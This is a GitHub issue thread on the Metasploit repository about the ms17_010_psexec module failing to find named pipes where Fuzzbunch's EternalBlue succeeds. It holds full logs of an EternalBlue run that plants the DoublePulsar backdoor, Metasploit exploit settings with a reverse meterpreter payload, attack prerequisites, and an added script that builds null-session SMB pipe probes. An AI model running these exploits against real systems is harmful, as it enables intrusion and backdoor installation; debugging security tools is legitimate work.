rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

ms17_010_psexec is not detecting namedpipes that the eternalblue (TSB) is. #9523

Closed Cr0n1c closed 6 years ago

Cr0n1c commented 6 years ago

Steps to reproduce

How'd you do it?

fb Touch (Namedpipetouch) > execute

[!] Preparing to Execute Namedpipetouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.11.1.73] : 
[?] Destination Port [445] : 
[+] (TCP) Local 10.11.1.73:445

[+] Configure Plugin Remote Tunnels

Module: Namedpipetouch
======================

Name              Value                                                 
----              -----                                                 
NetworkTimeout    60                                                    
TargetIp          10.11.1.73                                            
TargetPort        445                                                   
UsingNbt          False                                                 
PipeList          ['\PIPE\browser', '\PIPE\lsarpc', '\PIPE\spoolss',    
                   '\PIPE\360OnAccessGet', '\PIPE\360OnAccessSet', '    
                  \PIPE\aswUpdSv', '\PIPE\afwCallbackPipe2', '\PIPE\    
                  afwCallbackPipe2', '\PIPE\aswUpdSv', '\PIPE\_pspus    
                  er_780_AVGIDSMONITOR.EXE_9d97da47-8de1-4699-b3da-9    
                  eafb262f2a4', '\PIPE\AVG7B14C58C-E30D-11DB-B553-F8    
                  ... (plus 47 more lines)                              
DescList          ['OS Pipe: computer browser', 'OS Pipe: lsass rpc'    
                  , 'OS Pipe: print spooler', '360 Safe', '360 Safe'    
                  , 'alwil Avast professional 4.8 Avast Internet Sec    
                  urity v5.0', 'Avast Internet Security 5.0', 'Avast    
                   Internet Security 5.0', 'Avast pro 4.8 or Avast I    
                  S v5.0', 'AVG IS 8.5', 'AVG IS 8.5', 'AVG IS 8.5',    
                  ... (plus 35 more lines)                              
Protocol          SMB                                                   

[?] Execute Plugin? [Yes] : 
[*] Executing Plugin
[+] Initializing Connection...
[+] Connection established.
[+] Testing 86 pipes

[+] Testing for OS Pipe: computer browser
    [+] Pipe Found: \PIPE\browser

[+] Testing for OS Pipe: lsass rpc
    [+] Pipe Found: \PIPE\lsarpc

Throwing EternalBlue from here works.

===================

Name                  Value                                                 
----                  -----                                                 
DaveProxyPort         0                                                     
NetworkTimeout        60                                                    
TargetIp              10.11.1.73                                            
TargetPort            445                                                   
VerifyTarget          True                                                  
VerifyBackdoor        True                                                  
MaxExploitAttempts    3                                                     
GroomAllocations      12                                                    
ShellcodeBuffer                                                             
Target                WIN72K8R2                                             

[?] Execute Plugin? [Yes] : 
[*] Executing Plugin
[*] Connecting to target for exploitation.
    [+] Connection established for exploitation.
[*] Pinging backdoor...
    [+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (43 bytes):
0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
0x00000020  69 63 65 20 50 61 63 6b 20 31 00                 ice Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
    ................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
    [+] Sending SMBv2 buffers
        .............DONE.
    [+] Sending large SMBv1 buffer..DONE.
    [+] Sending final SMBv2 buffers......DONE.
    [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
    DONE.
[*] Receiving response from exploit packet
    [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
    [+] Backdoor returned code: 10 - Success!
    [+] Ping returned Target architecture: x86 (32-bit)
    [+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000  08 00                                            ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

fb Special (Eternalblue) > 

When trying to use the new module, I have encountered 3 instances where EternalBlue worked but this module bailed due to not finding a named pipe.


Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   DBGTRACE              false            yes       Show extra debug trace info
   LEAKATTEMPTS          99               yes       How many times to try to leak transaction
   NAMEDPIPE                              no        A named pipe that can be connected to (leave blank for auto)
   RHOST                 10.11.1.73       yes       The target address
   RPORT                 445              yes       The Target port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as

Payload options (windows/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.11.0.70       yes       The local listener hostname
   LPORT     8443             yes       The local listener port
   LURI                       no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] 10.11.1.73:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[-] 10.11.1.73:445 - Unable to find accessible named pipe!

Even when I specify the NAMEDPIPE it is still unable to find it. Looking at Wireshark, I can see that it detects it and gets an ACCESS DENIED.

If namedpipe is not detected, should it just use eternalblue? I do not see it using namedpipes in the actual exploit.

I installed Metasploit with:

OS

What OS are you running Metasploit on? Kali

Shadowshusky commented 6 years ago

My module always said "/usr/share/metasploit-framework/modules/auxiliary/admin/smb/ms17_010_command.rb: NameError uninitialized constant Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010". I don't know why, could you help me handle this issue?

Cr0n1c commented 6 years ago

Mine did too, easiest thing to do is check out the dev branch. It fixed my stuff. I then ran `cp -R /root/git/metasploit-framework/ /real/path/to/metasploit-framework`. That fixed the issues.

busterb commented 6 years ago

Hmm, if you are getting access denied, does this mean that authentication via SMBUser/SMBPass is needed on the target? Can you say more about the target @Cr0n1c ?

Shadowshusky commented 6 years ago

Emm... I still have some questions. You mean, clone this metasploit-framework to my Kali, then run it? I moved ms17_010_psexec.rb to /usr/share/metasploit-framework/modules/exploit/windows/smb, which is the same path as in this git. But it doesn't work.....

bcoles commented 6 years ago

@Shadowshusky your issues aren't related to detecting named pipes. See issue #9499

Shadowshusky commented 6 years ago

@bcoles thanks,i will try it.

dark8960 commented 6 years ago

me too

Cr0n1c commented 6 years ago

In logical order:

Fuzzbunch
    -> fuzzbunch-2018-02-08.11.31.26.989000.txt : Contains the order I ran the scripts.
    -> smbtouch
          -> Smbtouch-1.1.1.exe-2018-02-08.11.31.49.254000.txt: Text based results of the scan
          -> smbtouch.pcap: Wireshark capture of the scan
    -> namedpipetouch
          -> Namedpipetouch-2.0.0.exe-2018-02-08.11.32.55.080000.txt: Text based results of the scan
          -> namedpipetouch.pcap: Wireshark capture of the scan
     -> eternalblue
          -> Eternalblue-2.2.0.exe-2018-02-08.11.34.50.727000.txt: Text based results of exploit (it was already implanted, so it bailed)
          -> Eternalblue-2.2.0.exe-2018-02-08.11.41.57.920000.txt: Text based results of exploit
          -> eternalblue_fuzzbunch.pcap: Wireshark capture of the successful exploit (not the already sploited on)
      -> doublepulsar
           -> Doublepulsar-1.3.1.exe-2018-02-08.11.44.06.388000.txt: Text based results [proof of successful sploit]

Metasploit
     ===================================================
     msf5 > use auxiliary/scanner/smb/smb_version 
     msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.11.1.73
     RHOSTS => 10.11.1.73
     msf5 auxiliary(scanner/smb/smb_version) > run

     [+] 10.11.1.73:445        - Host is running Windows 7 Professional SP1 (build:7601) (name:GAMMA) (workgroup:WORKGROUP )
     [*] Scanned 1 of 1 hosts (100% complete)
     [*] Auxiliary module execution completed
     msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/pipe_auditor 
     msf5 auxiliary(scanner/smb/pipe_auditor) > show options

     Module options (auxiliary/scanner/smb/pipe_auditor):

        Name       Current Setting  Required  Description
        ----       ---------------  --------  -----------
        RHOSTS                      yes       The target address range or CIDR identifier
        SMBDomain  .                no        The Windows domain to use for authentication
        SMBPass                     no        The password for the specified username
        SMBUser                     no        The username to authenticate as
        THREADS    1                yes       The number of concurrent threads

     msf5 auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 10.11.1.73
     RHOSTS => 10.11.1.73
     msf5 auxiliary(scanner/smb/pipe_auditor) > run

     [*] Scanned 1 of 1 hosts (100% complete)
     [*] Auxiliary module execution completed
     msf5 auxiliary(scanner/smb/pipe_auditor) > use exploit/windows/smb/ms17_010_psexec 
     msf5 exploit(windows/smb/ms17_010_psexec) > set RHOST 10.11.1.73
     RHOST => 10.11.1.73
     msf5 exploit(windows/smb/ms17_010_psexec) > show options

     Module options (exploit/windows/smb/ms17_010_psexec):

        Name                  Current Setting  Required  Description
        ----                  ---------------  --------  -----------
        DBGTRACE              false            yes       Show extra debug trace info
        LEAKATTEMPTS          99               yes       How many times to try to leak transaction
        NAMEDPIPE                              no        A named pipe that can be connected to (leave blank for auto)
        RHOST                 10.11.1.73       yes       The target address
        RPORT                 445              yes       The Target port
        SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
        SERVICE_DISPLAY_NAME                   no        The service display name
        SERVICE_NAME                           no        The service name
        SHARE                 ADMIN$           yes       The share to connect to, can be an admin share      (ADMIN$,C$,...) or a normal read/write folder share
        SMBDomain             .                no        The Windows domain to use for authentication
        SMBPass                                no        The password for the specified username
        SMBUser                                no        The username to authenticate as

     Exploit target:

        Id  Name
        --  ----
        0   Automatic

     msf5 exploit(windows/smb/ms17_010_psexec) > exploit

     [*] Started reverse TCP handler on 10.11.0.70:4444 
     [*] 10.11.1.73:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
     [-] 10.11.1.73:445 - Unable to find accessible named pipe!
     [*] Exploit completed, but no session was created.
     ===================================================
     -> msf_smb_version_and_pipe_auditor.pcap: Wireshark capture of the scan.
     -> msf_ms17_010_psexec.pcap: Wireshark capture of the failed exploit attempt.

CobaltStrike
     -> 10.11.1.73_system_info.txt: ran systeminfo and dir on c:\  Target is a x86 Windows 7

10.11.1.73_system_info.txt
Doublepulsar-1.3.1.exe-2018-02-08.11.43.12.308000.log
Doublepulsar-1.3.1.exe-2018-02-08.11.44.06.388000.log
Doublepulsar-1.3.1.exe-2018-02-08.11.44.27.420000.log
Eternalblue-2.2.0.exe-2018-02-08.11.34.50.727000.log
Eternalblue-2.2.0.exe-2018-02-08.11.41.57.920000.log
fuzzbunch-2018-02-08.11.31.26.967000.log
fuzzbunch-2018-02-08.11.31.26.989000.log
Namedpipetouch-2.0.0.exe-2018-02-08.11.32.55.080000.log
Smbtouch-1.1.1.exe-2018-02-08.11.31.49.254000.log
Smbtouch-1.1.1.exe-2018-02-08.11.44.54.682000.log

Cr0n1c commented 6 years ago

Based on what I am seeing... the eternalblue exploit does not rely on needing a namedpipe. It looks like the other eternals need an authenticated pipe to work.

tkqasn commented 6 years ago

Me too, I'm on the same target.

th1sm0r1 commented 6 years ago

Have you solved the problem? @Cr0n1c

gearcapitan commented 6 years ago

named pipe on Windows 10 ??? kaligearcapitan-2018-03-02-14-20-58

Shadowshusky commented 6 years ago

To be able to use auxiliary/admin/smb/ms17_010_command:

1. You can OPTIONALLY use a valid username/password to bypass most of these requirements.
2. The firewall must allow SMB traffic.
3. The target must use SMBv1.
4. The target must be missing the MS17-010 patch.
5. The target must allow anonymous IPC$ and a Named Pipe.

You can check all of these with the SMB MS17-010 and Pipe Auditor auxiliary scanner modules.

I guess the problem may be in the named pipe. Maybe the target changed some options (such as some security standard), so we can't read the named pipe. I guess if we have the password to log in to SMB, maybe it can succeed.

gearcapitan commented 6 years ago

@Shadowshusky Yes, but if I already have the password, what the fuck do I want the ms17 exploit for? For that there is the plain psexec exploit. What you mention makes this "exploit" useless, because EternalBlue does work, but EternalSynergy with champions is very conflammatory. Obviously, if the OS is vulnerable (when I build the virtual lab I make sure it is vulnerable) the EternalBlue exploit works perfectly, but this one doesn't, so wtf? What's going on?

th1sm0r1 commented 6 years ago

On my side it's all Windows 10 14393. There is no success.

kawaxi commented 6 years ago

On the same boat here.... works flawlessly on Win 7 Ultimate but won't on Win 7 Pro.

xiaoxiaoleo commented 6 years ago

On the same boat too

busterb commented 6 years ago

You just need access to the IPC$ share, not a named pipe.
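
Added example, not the Metasploit module's code and not from anyone on this thread: the two SMB1 requests behind the pre-check discussed above (a null-session SMB_COM_TREE_CONNECT_ANDX to IPC$, then SMB_COM_NT_CREATE_ANDX on a pipe) and a triage of the NT status the server answers with, so that "ACCESS_DENIED on the tree connect" (credentials needed) can be told apart from "IPC$ accepted but every pipe refused" (the case this report shows). The target address and pipe names are taken from the report above; the server replies are constructed in the script so it runs offline, and the verdict strings are this example's own labels, not module output.

```python
"""Null-session IPC$ / named-pipe pre-check as SMB1 wire messages plus status
triage, run against constructed replies (added example, not Metasploit code)."""
import struct

# NT status codes (MS-ERREF) that matter for this triage.
STATUS_SUCCESS = 0x00000000
STATUS_ACCESS_DENIED = 0xC0000022
STATUS_OBJECT_NAME_NOT_FOUND = 0xC0000034
STATUS_LOGON_FAILURE = 0xC000006D
STATUS_BAD_NETWORK_NAME = 0xC00000CC

SMB_COM_TREE_CONNECT_ANDX = 0x75
SMB_COM_NT_CREATE_ANDX = 0xA2
FLAGS2_NT_STATUS = 0x4000   # ask for NT status instead of DOS error class/code
FLAGS2_UNICODE = 0x8000


def smb1_header(command, status=0, tid=0, uid=0, mid=1):
    """32-byte SMB1 header (MS-CIFS 2.2.3.1), little-endian, Flags=0x18."""
    return struct.pack('<4sBIBHH8sHHHHH', b'\xffSMB', command, status, 0x18,
                       FLAGS2_NT_STATUS | FLAGS2_UNICODE, 0, b'\x00' * 8,
                       0, tid, 0xFEFF, uid, mid)


def tree_connect_andx_request(unc_share, uid=0, mid=1):
    """SMB_COM_TREE_CONNECT_ANDX (MS-CIFS 2.2.4.55.1) as a null session sends it:
    the password is one NUL byte, so the UTF-16 path lands 16-bit aligned."""
    words = struct.pack('<BBHHH', 0xFF, 0, 0, 0, 1)  # no AndX, Flags=0, PasswordLength=1
    data = b'\x00' + unc_share.encode('utf-16le') + b'\x00\x00' + b'?????\x00'
    return (smb1_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid, mid=mid)
            + bytes([4]) + words + struct.pack('<H', len(data)) + data)


def nt_create_andx_request(pipe_name, tid, uid=0, mid=2):
    """SMB_COM_NT_CREATE_ANDX (MS-CIFS 2.2.4.64.1) opening e.g. '\\browser' on the IPC$ tree."""
    name = pipe_name.encode('utf-16le')
    words = struct.pack('<BBHBHIIIQIIIIIB',
                        0xFF, 0, 0,            # AndXCommand, AndXReserved, AndXOffset
                        0, len(name),          # Reserved, NameLength (bytes, no terminator)
                        0, 0,                  # Flags, RootDirectoryFID
                        0x0002019F,            # DesiredAccess: read/write/attrs/synchronize
                        0, 0x80,               # AllocationSize, ExtFileAttributes NORMAL
                        0x7, 1, 0,             # ShareAccess RWD, FILE_OPEN, CreateOptions
                        2, 0)                  # ImpersonationLevel, SecurityFlags
    data = b'\x00' + name + b'\x00\x00'        # 1 pad byte: 32+1+48+2 = 83 is odd
    return (smb1_header(SMB_COM_NT_CREATE_ANDX, tid=tid, uid=uid, mid=mid)
            + bytes([24]) + words + struct.pack('<H', len(data)) + data)


def parse_status(response):
    """Return (command, nt_status, tid) from an SMB1 reply header."""
    if len(response) < 32 or response[:4] != b'\xffSMB':
        raise ValueError('not an SMB1 message')
    command, status = struct.unpack_from('<BI', response, 4)
    flags2 = struct.unpack_from('<H', response, 10)[0]
    if not flags2 & FLAGS2_NT_STATUS:
        raise ValueError('reply carries DOS error codes; cannot read NT status')
    tid = struct.unpack_from('<H', response, 24)[0]
    return command, status, tid


def triage(tree_status, pipe_results):
    """Turn the statuses into the reason the module can or cannot proceed.
    pipe_results maps pipe name -> NT status of its NT Create."""
    if tree_status in (STATUS_ACCESS_DENIED, STATUS_LOGON_FAILURE):
        return 'ipc_denied'          # null session refused: SMBUser/SMBPass needed
    if tree_status == STATUS_BAD_NETWORK_NAME:
        return 'no_ipc_share'
    if tree_status != STATUS_SUCCESS:
        return 'tree_connect_failed'
    usable = [p for p, s in pipe_results.items() if s == STATUS_SUCCESS]
    if usable:
        return 'ok:' + usable[0]     # what a blank NAMEDPIPE would auto-select
    if pipe_results and all(s == STATUS_ACCESS_DENIED for s in pipe_results.values()):
        return 'pipes_denied'        # every pipe answers ACCESS_DENIED, as in this report
    return 'no_pipe'


def constructed_reply(command, status, tid=0):
    """Constructed server reply (header only, which is all the status check reads)."""
    return smb1_header(command, status=status, tid=tid)


def demo():
    """IPC$ accepted anonymously but every pipe refused: the case this issue describes."""
    tree_connect_andx_request(r'\\10.11.1.73\IPC$')            # would go on the wire
    _, tree_status, tid = parse_status(
        constructed_reply(SMB_COM_TREE_CONNECT_ANDX, STATUS_SUCCESS, tid=0x0801))
    pipes = {}
    for pipe in (r'\browser', r'\lsarpc', r'\spoolss'):
        nt_create_andx_request(pipe, tid=tid)                     # would go on the wire
        _, pipes[pipe], _ = parse_status(
            constructed_reply(SMB_COM_NT_CREATE_ANDX, STATUS_ACCESS_DENIED, tid=tid))
    return triage(tree_status, pipes)


if __name__ == '__main__':
    print(demo())
```

Against a live host the same bytes would be wrapped in a 4-byte NetBIOS session header and sent after a Negotiate and a null-session Session Setup; the triage is the part worth keeping, because it says which option to change (credentials for `ipc_denied`, a different pipe or `NAMEDPIPE` for `pipes_denied`) instead of the single "Unable to find accessible named pipe!" line.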

imanihb2007 commented 5 years ago

Based on what I am seeing... the eternalblue exploit does not rely on needing a namedpipe. It looks like the other eternals need an authenticated pipe to work.

Have you solved your problem?